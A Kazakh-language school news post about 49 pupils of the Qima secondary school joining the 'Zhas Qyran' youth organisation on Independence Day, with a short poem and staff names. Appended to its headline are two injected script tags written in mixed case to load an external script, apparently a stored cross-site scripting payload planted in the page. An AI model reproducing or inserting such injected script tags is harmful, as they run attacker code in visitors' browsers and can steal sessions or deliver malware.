Ғ.Әбдірахмангұлы атындағы Қима орта мектебі бойынша Республикалық «Жас Ұлан» бірыңғай балалар мен жасөспірімдер ұйымының Жас Қыран қатарына қабылдау өткізілді.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

24.12.2020

    16 желтоқсан Тәуелсіздік күніне орай «Жас Ұлан» бірыңғай балалар мен жасөспірімдер ұйымының  қатарына қабылдау жиыны өтті. Жас Ұлан ұйымы қатарына 1,2 сыныптың 49 оқушылары Жас Қыранға қабылданды. 

         Ұйымның мақсаты: өскелең жас ұрпақтың бойында патриоттық, білім мен өзін-өзі жетілдіруге деген құштарлық,беріктік, Отан тарихына, Тәуелсіз Қазақстанның бүгіні мен болашағына деген жауапкершілікке тәрбиелеу.

«Біз – болашақ жас Қыран,

Өз Отанын қорғайтын.

Білім сүйер Ұланбыз,

Заңғар көкке самғайтын»,- дейді біздің Жас Қырандар. Жиын барысында мектеп аға тәлімгері – Жұматаев Аманғали Төлеубайұлы және мектеп Ұланбасы – Ибрашева Жасмина Жас Қыранға қабылданушыларды құттықтап, «Жас Қыран» төсбелгілерін табыстады.

Болашақта ел үмітін ақтайтын үлкен азамат пен азаматшалар болатынына сенім білдіреміз, ЖАС ҚЫРАНДАР!

Просмотров: 454


Пікір қосу



Деректерді қолтаңбаға қосу